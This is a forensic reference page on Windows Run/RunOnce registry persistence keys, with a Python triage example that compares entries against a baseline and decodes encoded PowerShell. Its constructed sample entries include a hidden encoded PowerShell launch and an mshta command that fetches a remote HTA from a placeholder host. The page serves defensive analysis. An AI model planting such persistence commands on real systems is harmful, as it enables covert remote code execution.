Run / RunOnce Persistence Keys

Tags: Windows, Persistence Mechanisms, Disk Image

Location

NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run (per-user) and SOFTWARE\Microsoft\Windows\CurrentVersion\Run (machine-wide)

Description

Registry Run and RunOnce keys that specify programs to execute at user logon (NTUSER.DAT) or system startup (SOFTWARE hive). RunOnce entries are deleted after execution. Both per-user and machine-wide variants exist.

Forensic Value

Run keys are the most common registry persistence mechanism used by malware and attackers. Entries contain the full command line executed at every logon, revealing persistence payloads including encoded PowerShell, mshta calls, or paths to dropped binaries. RunOnce entries execute once and self-delete, but may still be recovered from registry transaction logs or VSS snapshots. Comparing current entries against a known-good baseline immediately identifies attacker additions.
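The baseline comparison and command-line review described above, as an added Python example (not part of this reference page or of any of the tools it lists). The Run-key entries are constructed in the shape an analyst might export from Registry Explorer or RegRipper, and the heuristics and encoded payload are illustrative assumptions.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed sample Run-key entries keyed by (hive, value name). Not from a real system.
BASELINE: Dict[Tuple[str, str], str] = {
    ("NTUSER.DAT", "OneDrive"): r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    ("SOFTWARE", "SecurityHealth"): r"%windir%\system32\SecurityHealthSystray.exe",
}
CURRENT: Dict[Tuple[str, str], str] = dict(BASELINE)
CURRENT[("NTUSER.DAT", "Updater")] = "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="  # decodes to "AAAA"
CURRENT[("SOFTWARE", "svchost")] = "mshta.exe http://example.invalid/a.hta"
CURRENT[("NTUSER.DAT", "Helper")] = r"C:\Users\alice\AppData\Roaming\x\helper.exe"

# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand; capture the base64 argument.
ENC_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def new_entries(baseline: Dict, current: Dict) -> Dict:
    """Entries added or changed relative to the known-good baseline."""
    return {k: v for k, v in current.items() if baseline.get(k) != v}


def decode_encoded_command(cmd: str) -> str:
    """Decode an -EncodedCommand payload (base64 of UTF-16LE, as PowerShell expects) or return ''."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def flag_command(cmd: str) -> List[str]:
    """Triage heuristics for one Run-key command line; each hit names the reason."""
    low = cmd.lower()
    flags: List[str] = []
    if re.search(r"\b(?:powershell|pwsh)\b", low) and ENC_FLAG.search(cmd):
        flags.append("encoded-powershell")
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        flags.append("hidden-window")
    if re.search(r"\bmshta\b", low):
        flags.append("mshta")
    if re.search(r"\\appdata\\|\\temp\\|\\users\\public\\", low):
        flags.append("user-writable-path")
    return flags


def triage(baseline: Dict, current: Dict) -> Dict[Tuple[str, str], Tuple[List[str], str]]:
    """Map each new or changed entry to its flags and any decoded PowerShell payload."""
    return {k: (flag_command(v), decode_encoded_command(v)) for k, v in new_entries(baseline, current).items()}
```

Diffing against the baseline first is what keeps the legitimate OneDrive entry, which also lives under AppData, out of the report.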

Tools Required

KAPE
Registry Explorer (Eric Zimmerman)
RegRipper
Autoruns (Sysinternals)